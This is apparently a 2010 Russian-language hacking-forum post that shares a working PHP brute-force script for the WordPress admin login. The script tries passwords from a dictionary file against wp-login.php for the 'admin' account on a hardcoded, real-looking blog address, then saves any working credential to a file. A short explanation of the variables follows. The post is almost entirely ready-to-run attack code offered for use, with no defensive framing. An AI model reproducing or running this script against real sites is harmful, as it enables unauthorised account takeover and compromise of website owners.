| Xmas_Maniac |
06.01.2010 13:46 |
Брут WordPress 2.8.4
PHP код:
<?php
/*
WordPress brute
Tested on WordPress 2.8.4 russian
==================================
visit http://wordpress.org/
*/
/* Console PHP version */
$blogaddr="http://blog.aplus.by/";
$login="admin";
$dict="dict.txt";
$pwds=file($dict);
$fg=fopen("good.txt","w");
foreach ($pwds as $pass)
{
$post="log=".$login."&pwd=".$pass."&wp-submit=Login&redirect_to=".$blogaddr."wp-admin/&testcookie=1";
$ch=curl_init($blogaddr."wp-login.php");
CURL_SETOPT($ch, CURLOPT_POST, 1);
CURL_SETOPT($ch, CURLOPT_POSTFIELDS, $post);
CURL_SETOPT($ch, CURLOPT_COOKIEFILE, "cookie.txt");
CURL_SETOPT($ch, CURLOPT_COOKIEJAR, "cookie.txt");
CURL_SETOPT($ch, CURLOPT_HEADER, 0);
CURL_SETOPT($ch, CURLOPT_URL, $blogaddr."wp-login.php");
CURL_SETOPT($ch, CURLOPT_RETURNTRANSFER, 1);
CURL_SETOPT($ch, CURLOPT_FOLLOWLOCATION, true);
$result=curl_exec($ch);
curl_close($ch);
if (strstr($result,"wpOnload")) {
fwrite($fg,"good: $login : $pass"); exit; }
}
fclose($fg);
/* */
?>
$blogaddr – Переменная, в которой хранится адрес блога.
$login – Логин.
$dict – Имя файла словаря. |
